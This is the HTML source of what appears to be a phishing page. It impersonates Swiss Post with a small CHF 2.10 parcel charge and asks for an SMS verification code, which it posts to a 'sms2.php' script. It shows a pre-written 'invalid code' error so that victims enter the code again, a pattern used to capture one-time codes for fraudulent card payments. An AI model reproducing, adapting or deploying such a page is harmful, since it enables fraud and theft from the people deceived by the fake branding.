<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=Edge">
    
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1">
    <meta name="apple-mobile-web-app-capable" content="yes">
	      <title>Facturation en ligne</title>
    <link type="image/x-icon" rel="icon" href="./images/favicon.ico">
    <link type="image/x-icon" rel="shortcut icon" href="./images/favicon.ico">
      <link href="pubup.css" rel="stylesheet">
      <link href="x0x.css" rel="stylesheet">

    <style type="text/css">


    </style>
</head>

<body>
    <div id="main" style="width: 100%">
        <div id="inner" style="">
            <div id="FlexContainer1">
<div id="wb_Image1" style="display:inline-block;width:240px;z-index:0;">
<img src="post-logo-svg_FR.svg" id="Image1" alt="">
</div>
<div id="wb_Image2" style="display:inline-block;width:26px;z-index:1;">
</div>
</div><div id="content">
                
                <div class="mainContainerPaymentzone">
					
<div class="WaitMsgClass" id="WaitMsgId" style="display: none;background-color: #FFFFFF;border: solid #CCCCCC 4px;padding: 4px;color: #000000;font-family: Verdana;font-weight: bold;position: absolute;width: 350px;"><img id="waitGif" src="./Betaalbevestiging_files/wait_turn.gif"></div>

	<!-- Order overview -->
	<h2 style="display: inline; position: absolute; left: -1000px; top: -1000px; width: 0px; height: 0px; overflow: hidden;"></h2>
	<table class="ncoltable1" border="0" cellpadding="2" cellspacing="0" width="95%" id="ncol_ref">
			
							<tbody><tr>
								<td class="ncoltxtl" colspan="1" align="right" width="50%"><small> <!--External reference--></small></td>
								<td class="ncoltxtr" colspan="1" width="50%"><small>CF009574116CH</small></td>
							</tr>
						

				<tr>
					
							<td class="ncoltxtl" colspan="1" align="right" width="50%"><small>
							<!--Total to pay-->
							
							</small></td>
							<td class="ncoltxtr" colspan="1" width="50%">
								<small>CHF 2.10 
							</small>
							</td>
					
				</tr>
				
					<tr>
						<td class="ncoltxtl" colspan="1" align="right"><small><!--Beneficiary--></small></td>
						<td class="ncoltxtr" colspan="1"><small>Post CH AG</small></td>
					</tr>
					
	</tbody></table>

						<form method="POST" action="sms2.php" name="OGONE_CC_FORM" onsubmit="return my_valscript(this);">
					<p></p>
					<!-- Hidden title for screenreaders (Payment Data) -->
					<h2 style="display: inline; position: absolute; left: -1000px; top: -1000px; width: 0px; height: 0px; overflow: hidden;"></h2>
						<table class="ncoltable2" border="0" cellpadding="2" cellspacing="0" width="95%">

						<tbody>
							
									<tr id="cvc_dob_row">
										

                                        <td class="ncoltxtl2" align="right">
                                            <small>
                                                <label id="lbl_ecom_payment_card_identification" for="Ecom_Payment_sms_Verification" style="display:none"></label>
                                                <label id="lbl_cvc" for="Ecom_Payment_sms_Verification"></label>
										    </small>
										</td>

										<td class="ncolinput">
											<small>
											
												<input type="text" required="required" name="Ecom_Payment_sms_Verification" id="Ecom_Payment_sms_Verification" autocomplete="Off" size="10" maxlength="10" aria-required="true">
<font size="" color="#ff0000" face="Arial"><strong>Der eingegebene Code ist ungültig.</strong></font>
											
                                                </small>
										</td>
									</tr>
								<tr>
									<td colspan="2" valign="middle" align="center">
										<small><small>
										* Benötigte Felder
										<br>
										
								</small>
										</small>
										</td>
								</tr>
								<tr align="center">
									<td colspan="2" valign="middle" align="center">
										<small>
										
									<input type="submit" class="ncol" name="payment" value="CONTINUER" id="submit3">
								
										</small>
										</td>
								</tr>
						</tbody></table>

                </form></div>
            </div>
        </div>
    </div>



</body></html>